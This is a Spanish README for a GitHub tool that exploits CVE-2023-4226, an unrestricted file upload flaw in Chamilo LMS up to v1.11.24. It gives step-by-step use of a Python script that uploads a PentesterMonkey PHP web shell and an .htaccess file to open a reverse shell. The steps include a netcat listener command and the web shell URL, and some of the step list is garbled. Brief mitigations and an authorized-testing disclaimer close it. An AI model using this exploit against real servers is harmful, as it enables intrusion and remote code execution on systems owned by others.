
Vulnerabilidad de carga de archivos sin restricciones en **Chamilo LMS** (<= v1.11.24).
Script en Python que automatiza la explotación de CVE-2023-4226, una vulnerabilidad de carga de archivos sin restricciones en Chamilo LMS (<= v1.11.24). Sube un web shell PHP basado en PentesterMonkey y configura .htaccess para lograr una reverse shell. Más detalles: Advisory de STAR Labs.
/main/inc/ajax/work.ajax.php, logrando RCE.ch_sid).rce.php con IP y puerto./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php para subir rce.php y .htaccess./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
Archivos: rce.php (PentesterMonkey, incluido en el repositorio), .htaccess (generado por el script).
Red: IP y puerto para el listener (ej. nc -lvnp 4444).
Clona el repositorio:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Asigna permisos de ejecución al script:
chmod +x CVE-2023-4226.py
Instala dependencias:
pip install requests colorama
Inicia el listener en una terminal:
nc -lvnp 4444
Ejecuta el script:
./CVE-2023-4226.py
Ingresa:
ch_sid.Accede al web shell para iniciar la reverse shell:
http://<chamilo>/app/cache/rce.php
Ejemplo: http://chamilo.local/app/cache/rce.php
Actualiza a Chamilo >= v1.11.26.
Sanitiza nombres de archivos.
Bloquea HTML en disable_dangerous_file().
Agrega a .htaccess:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Uso exclusivo para pruebas autorizadas. El uso no autorizado es ilegal.